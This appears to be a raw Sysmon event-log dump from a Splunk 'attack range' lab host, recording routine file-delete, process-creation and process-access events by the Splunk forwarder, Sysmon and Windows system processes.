AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49592-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:18.207{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8F723A42F7CEA77F7348F4953436CA5,SHA256=8E6276C3F7AB29D0E0DF586016D5F3254A8281B3E4F097239C7D699796DB92F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:19.480{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0678B0327ECF294F6237AC2DAE98DCC,SHA256=46C5B6791E24FA6EB6F7504281A91442FC6F9AB74B331584A98DC3C3485AE0A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.875{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19DB-6216-7307-000000003802}6756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.875{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-19DB-6216-7307-000000003802}6756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.875{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19DB-6216-7307-000000003802}6756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.876{C8EA50B7-19DB-6216-7307-000000003802}6756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000299155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.608{C8EA50B7-19DB-6216-7207-000000003802}66366540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.288{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19DB-6216-7207-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.272{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-19DB-6216-7207-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.272{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.272{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.272{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.272{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.272{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19DB-6216-7207-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.275{C8EA50B7-19DB-6216-7207-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:19.226{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E00F9EF61AAF31C5789A604A401FFC51,SHA256=6B2C243869E11E87CB7062DF04855C86553D282FD5AF003233FCB7F57FE76F44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:20.511{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F9A206C4DF08DC430D4DA37FC840E0E,SHA256=40AE1C6E8109C0039983C2D21B147B20BBFA7266274B7D027AF141D8732E1B03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.661{C8EA50B7-19DC-6216-7407-000000003802}48885224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.592{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.592{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.592{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.576{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.576{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.576{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.376{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19DC-6216-7407-000000003802}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.376{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 